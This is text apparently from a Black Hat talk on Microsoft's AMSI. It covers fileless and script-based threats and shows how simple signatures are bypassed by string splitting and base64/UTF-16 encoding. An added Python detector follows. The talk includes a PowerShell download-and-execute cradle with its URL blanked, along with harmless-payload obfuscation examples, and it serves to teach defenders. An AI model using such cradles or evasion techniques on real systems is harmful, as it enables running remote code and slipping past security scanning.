The Rise and Fall of AMSI - Black Hat Briefings
The Rise and Fall of AMSI
@Tal_Liberman
About me
@Tal_Liberman
Research & Reverse Engineering
Founder @ Polarium
Previously Head of Research Team @ enSilo
#ProcessDoppelgänging #AtomBombing
Overview
Introduction
Script Based & Fileless Threats
Obfuscation
The Cat and Mouse Game
AMSI Overview
AMSI from the Developer's Perspective
AMSI from the Security Vendor's Perspective
Building and Registering Your Own AMSI Provider
Bypassing AMSI
Final Thoughts
Script Based Threats
"Script-based malware - on the rise"
This is not a trend - it's mainstream
There are more script based threats than there are binary threats*
Why scripts?
- Already available on all target machines
- Vastly used in domain settings
- Scripts are faster to develop
- Minimal skills needed to achieve good functionality
- Obfuscation of text is simpler than obfuscation of machine code
- Harder to monitor scripts than compiled executables
Fileless Threats
A file always has to be run
(Assuming the malware survives a reboot)
But it can be an MS signed executable being abused
Notorious examples are Poweliks and Kovter
The main idea is to use a scripting engine to run code via command line
Example:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(`')"
Obfuscation
In software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand -Wikipedia.
Well... except for the word "humans".
The Cat and Mouse Game
Let's start with a simple example:
function Invoke-Malware { Write-Host 'Malware!'; }
Simple signature: if script contains "Write-Host 'Malware'" -> Malicious
Simple bypass:
function Invoke-Malware { Write-Host "Malware!"; }
Simple signature: if re.findall("Write-Host .Malware.", script) -> Malicious
Simple bypass:
function Invoke-Malware { Write-Host ("Mal" + "ware!"); }
The Cat and Mouse Game
Let's start being a little more sophisticated (just a bit):
function Invoke-NotMalware {
    $malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi";
    $malware = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($malware_base64));
    IEX ($malware);
}
Simple signature:
if script contains "V3JpdGUtSG9zdCAiTWFsd2FyZSEi" -> Malicious
Simple bypass:
function Invoke-NotMalware {
    $malware_base64 = "VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA";
    $malware = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($malware_base64));
    IEX ($malware);
}
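To make the slide's point concrete, here is an added Python example (not part of the talk) that compares the blob signature with a detector that decodes each base64 literal under both ASCII and UTF-16LE before applying the slide's earlier "Write-Host .Malware." regex. Both sample scripts are constructed from the snippets above; the two blobs decode to the same `Write-Host "Malware!"` command.

```python
import base64
import re

# Constructed samples: the two Invoke-NotMalware variants from the slide above.
ASCII_VARIANT = (
    'function Invoke-NotMalware { '
    '$malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"; '
    '$malware = [System.Text.Encoding]::ASCII.GetString('
    '[System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }'
)
UNICODE_VARIANT = (
    'function Invoke-NotMalware { '
    '$malware_base64 = "VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA"; '
    '$malware = [System.Text.Encoding]::UNICODE.GetString('
    '[System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }'
)

# The slide's blob signature: one exact base64 string.
BLOB_SIGNATURE = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"
# The slide's earlier content signature, applied here to decoded payloads too.
CONTENT_SIGNATURE = re.compile(r"Write-Host .Malware.")
# Double-quoted literals that look like base64 (16+ chars, optional padding).
BASE64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def blob_signature_hits(script: str) -> bool:
    """Static match on the blob itself; defeated by re-encoding the payload."""
    return BLOB_SIGNATURE in script


def decode_candidates(blob: str):
    """Yield the ASCII and UTF-16LE readings of one base64 literal."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return
    for encoding in ("ascii", "utf-16-le"):
        try:
            yield raw.decode(encoding)
        except UnicodeDecodeError:
            continue


def content_signature_hits(script: str) -> bool:
    """Match the script text plus every decoding of each embedded blob."""
    texts = [script]
    for blob in BASE64_LITERAL.findall(script):
        texts.extend(decode_candidates(blob))
    return any(CONTENT_SIGNATURE.search(text) for text in texts)
```

Decoding candidate blobs catches both variants, but the string-concatenation bypass from the previous slide still evades this regex, which is the gap AMSI closes by scanning content at execution time rather than on disk.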